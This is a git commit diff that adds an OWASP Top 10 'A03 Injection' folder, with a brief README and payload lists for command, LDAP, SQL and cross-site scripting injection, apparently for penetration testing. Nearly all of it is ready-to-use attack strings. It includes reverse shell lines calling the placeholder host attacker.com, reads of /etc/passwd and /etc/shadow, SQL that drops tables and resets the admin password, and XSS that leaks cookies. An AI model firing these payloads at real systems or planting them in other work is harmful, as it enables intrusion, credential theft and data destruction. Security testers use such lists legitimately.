Add comprehensive OWASP Top 10 directory structure with injection payloads

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>

OWASP-Top-10/A03-Injection/README.md

@@ -0,0 +1,15 @@
+# A03 - Injection
+
+## Description
+Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
+
+## Common Injection Types
+- SQL Injection
+- Cross-Site Scripting (XSS)
+- Command Injection
+- LDAP Injection
+- XML Injection
+- Template Injection
+
+## Testing Approach
+Submit malicious input containing special characters and observe application behavior, error messages, and response times.

OWASP-Top-10/A03-Injection/command-injection-payloads.txt

@@ -0,0 +1,80 @@
+# Command Injection Payloads
+
+# Basic command injection
+; ls
+| ls
+|| ls
+& ls
+&& ls
+`ls`
+$(ls)
+
+# Chained commands
+; whoami
+| whoami
+|| whoami
+& whoami
+&& whoami
+
+# Command substitution
+`whoami`
+$(whoami)
+;`whoami`
+;$(whoami)
+
+# File operations
+; cat /etc/passwd
+| cat /etc/passwd
+; cat /etc/shadow
+| cat /etc/shadow
+; ls -la
+| ls -la /
+
+# Windows commands
+& dir
+| dir
+& type C:\Windows\win.ini
+| type C:\boot.ini
+& whoami
+| net user
+
+# Time-based detection
+; sleep 5
+| sleep 5
+& ping -n 5 127.0.0.1
+| ping -c 5 127.0.0.1
+; timeout 5
+& timeout /t 5
+
+# Output redirection
+; ls > /tmp/output.txt
+| ls > /tmp/output.txt
+& dir > C:\temp\output.txt
+
+# URL encoded
+%3B%20ls
+%7C%20ls
+%26%20whoami
+
+# Newline injection
+%0a whoami
+%0d%0a whoami
+\n whoami
+\r\n whoami
+
+# Spaces bypass
+;cat</etc/passwd
+|cat</etc/passwd
+{cat,/etc/passwd}
+cat${IFS}/etc/passwd
+cat$IFS/etc/passwd
+
+# Quotes bypass
+c'a't /etc/passwd
+c"a"t /etc/passwd
+c\at /etc/passwd
+
+# Reverse shell payloads (for testing only)
+; nc -e /bin/sh attacker.com 4444
+| bash -i >& /dev/tcp/attacker.com/4444 0>&1
+& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);"

OWASP-Top-10/A03-Injection/ldap-injection-payloads.txt

@@ -0,0 +1,39 @@
+# LDAP Injection Payloads
+
+# Basic LDAP injection
+*
+*(uid=*)
+*(cn=*)
+*(objectClass=*)
+
+# Authentication bypass
+*)(uid=*))(|(uid=*
+*)(|(uid=*))
+*)(cn=admin)(|(cn=*
+admin)(&(uid=*))
+
+# Filter bypass
+*)(objectClass=*))(&(objectClass=*
+*)(|(password=*))
+*)(cn=*)(|(cn=*
+
+# Blind LDAP injection
+*)(cn=a*
+*)(cn=ad*
+*)(cn=adm*
+*)(cn=admin*
+
+# Boolean-based
+(&(uid=admin)(password=*))
+(&(uid=admin)(!(password=wrong)))
+(|(uid=admin)(uid=administrator))
+
+# Wildcard usage
+uid=*
+cn=*
+sn=*
+mail=*
+
+# Attribute extraction
+*)(objectClass=*))(%26(objectClass=*
+*)(uid=*))(%26(uid=*

OWASP-Top-10/A03-Injection/sql-injection-payloads.txt

@@ -0,0 +1,86 @@
+# SQL Injection Payloads
+
+# Basic SQL injection
+'
+''
+' OR '1'='1
+' OR 1=1--
+' OR 'a'='a
+" OR "1"="1
+" OR 1=1--
+admin' --
+admin' #
+admin'/*
+' OR '1'='1' --
+' OR '1'='1' #
+' OR '1'='1'/*
+
+# Union-based SQL injection
+' UNION SELECT NULL--
+' UNION SELECT NULL,NULL--
+' UNION SELECT NULL,NULL,NULL--
+' UNION ALL SELECT NULL--
+' UNION ALL SELECT NULL,NULL--
+' UNION SELECT 1,2,3--
+' UNION ALL SELECT 1,2,3--
+
+# Error-based SQL injection
+' AND 1=CONVERT(int,(SELECT @@version))--
+' AND 1=CAST((SELECT @@version) AS int)--
+' AND EXTRACTVALUE(1,CONCAT(0x5c,@@version))--
+' AND 1=UPDATEXML(1,CONCAT(0x5e24,(SELECT @@version),0x5e24),1)--
+
+# Boolean-based blind SQL injection
+' AND 1=1--
+' AND 1=2--
+' AND SUBSTRING(@@version,1,1)='5'--
+' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>100--
+
+# Time-based blind SQL injection
+'; WAITFOR DELAY '0:0:5'--
+'; SELECT SLEEP(5)--
+'; SELECT pg_sleep(5)--
+' AND SLEEP(5)--
+' AND 1=BENCHMARK(5000000,MD5('test'))--
+
+# Stacked queries
+'; DROP TABLE users--
+'; DELETE FROM users WHERE 1=1--
+'; INSERT INTO users VALUES ('hacker','pass')--
+'; UPDATE users SET password='hacked' WHERE username='admin'--
+
+# Comment injection
+--
+-- -
+#
+/**/
+/*!50000*/
+
+# Database-specific payloads
+# MySQL
+' AND 'x'='x
+' AND SLEEP(5) AND 'x'='x
+' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
+
+# PostgreSQL
+' AND 'x'='x
+'; SELECT pg_sleep(5)--
+
+# MSSQL
+' AND 'x'='x
+'; WAITFOR DELAY '00:00:05'--
+
+# Oracle
+' AND 'x'='x
+' AND 1=dbms_pipe.receive_message('a',5)--
+
+# SQLite
+' AND 'x'='x
+' AND LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(5/2))))--
+
+# NoSQL injection
+{"$gt": ""}
+{"$ne": null}
+{"$where": "sleep(5000)"}
+' || '1'=='1
+admin' || 'a'=='a

OWASP-Top-10/A03-Injection/xss-payloads.txt

@@ -0,0 +1,77 @@
+# XSS (Cross-Site Scripting) Payloads
+
+# Basic XSS
+<script>alert('XSS')</script>
+<script>alert(1)</script>
+<script>alert(document.cookie)</script>
+<script>alert(document.domain)</script>
+<script>alert(window.origin)</script>
+
+# IMG tag XSS
+<img src=x onerror=alert('XSS')>
+<img src=x onerror=alert(1)>
+<img src=javascript:alert('XSS')>
+<img src="x" onerror="alert(String.fromCharCode(88,83,83))">
+<img/src="x"/onerror=alert(1)>
+
+# SVG XSS
+<svg/onload=alert('XSS')>
+<svg onload=alert(1)>
+<svg><script>alert('XSS')</script></svg>
+<svg><animate onbegin=alert(1) attributeName=x dur=1s>
+
+# Body tag XSS
+<body onload=alert('XSS')>
+<body onpageshow=alert(1)>
+<body onfocus=alert(1)>
+
+# Input tag XSS
+<input onfocus=alert(1) autofocus>
+<input onblur=alert(1) autofocus><input autofocus>
+<input/onfocus=alert(1)/autofocus>
+
+# Event handler XSS
+<div onmouseover=alert(1)>test</div>
+<button onclick=alert(1)>click</button>
+<a href="#" onmouseover=alert(1)>link</a>
+
+# Encoded XSS
+&#60;script&#62;alert('XSS')&#60;/script&#62;
+\x3cscript\x3ealert('XSS')\x3c/script\x3e
+<script>alert(String.fromCharCode(88,83,83))</script>
+\u003cscript\u003ealert('XSS')\u003c/script\u003e
+
+# JavaScript protocol
+<a href="javascript:alert('XSS')">click</a>
+<iframe src="javascript:alert('XSS')">
+<object data="javascript:alert('XSS')">
+
+# DOM-based XSS
+<script>document.write('<img src=x onerror=alert(1)>')</script>
+<script>eval(location.hash.substr(1))</script>
+<script>document.location=document.cookie</script>
+
+# Filter bypass
+<scr<script>ipt>alert(1)</scr</script>ipt>
+<ScRiPt>alert(1)</sCrIpT>
+<script>alert(1)<!--
+<script>alert(1)//
+<script>/**/alert(1)</script>
+<script>al\u0065rt(1)</script>
+<svg><script>alert&#40;1&#41;</script>
+
+# Polyglot XSS
+javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
+
+# Attribute-based XSS
+"><script>alert(1)</script>
+'><script>alert(1)</script>
+"><img src=x onerror=alert(1)>
+'><img src=x onerror=alert(1)>
+
+# Template injection XSS
+{{alert(1)}}
+${alert(1)}
+<%= alert(1) %>
+{alert(1)}